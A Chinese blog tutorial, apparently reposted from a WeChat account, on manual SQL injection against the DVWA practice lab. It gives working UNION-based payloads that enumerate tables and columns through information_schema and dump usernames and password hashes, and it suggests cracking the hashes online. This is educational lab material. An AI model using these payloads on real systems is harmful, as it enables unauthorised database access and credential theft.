初探sql注入

Posted 暗夜技术分享

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了初探sql注入相关的知识,希望对你有一定的参考价值。

dvwa low手工注入测试 

ps:使用的靶场是dvwa,重在分享思路!

https://github.com/digininja/DVWA

原理: 一般来说,用户传入的数据不能直接在sql语句中运行,
服务器期望的是只得到传入的数据,而不是执行更加深入的语句
而当通过手工注入的时候,发现注入的错误语句被执行了,说明
程序允许更高级的语句通过程序运行,所以我们就可以使用更高级
的语句让程序执行


注入的方式:
1:错误的盲注:输入 ' 查看是否报错


2:基于布尔表达式的注入:判断是数字型的还是字符型的
and 1=1 -- (--空格)


3:基于时间的盲注 :and sleep(时间) 4:使用sqlmap等自动化工具进行注入




手工注入的步奏:
1:判断是否含有漏洞 。

1'


1' and 1=1 -- 和 ' and 1=2 -- ' 两者输出不同
1' and '1'='1' --



2:猜测查询数据库的字段数

1' group by 2 --



3:确认当前数据库名称和版本号,同时也是验证字段数确实为2

' union select database(),version() --



4:获取这个数据库中的表名,使用sql系统函数 (3)

1' union select 1,group_concat(table_name) from information_schema.tables wher table_schema=database() --

 
获得大量的表名。 


5:根据表名获得的字段名(4)

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --



6:根据字段名查询数据(*5)

1' union select user,password from users --




7:根据查询到的用户名和密码进行登录,对于加密密码可以到cmd5网站进行撞库破解



初探sql注入

音乐分享

本期的音乐是 十年

This browser does not support music or audio playback. Please play it in Weixin or another browser.


W先生

qq : 465879857

一起寻找生命中的光.....

 AUT  UMN 

创作不易,转发点赞是对我的最好鼓励!

暗夜技术分享 发起了一个读者讨论 留言


以上是关于初探sql注入的主要内容,如果未能解决你的问题,请参考以下文章

初探sql注入

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

PE病毒初探——向exe注入代码

MyBatis如何防止SQL注入

MyBatis怎么防止SQL注入

mybatis以及预编译如何防止SQL注入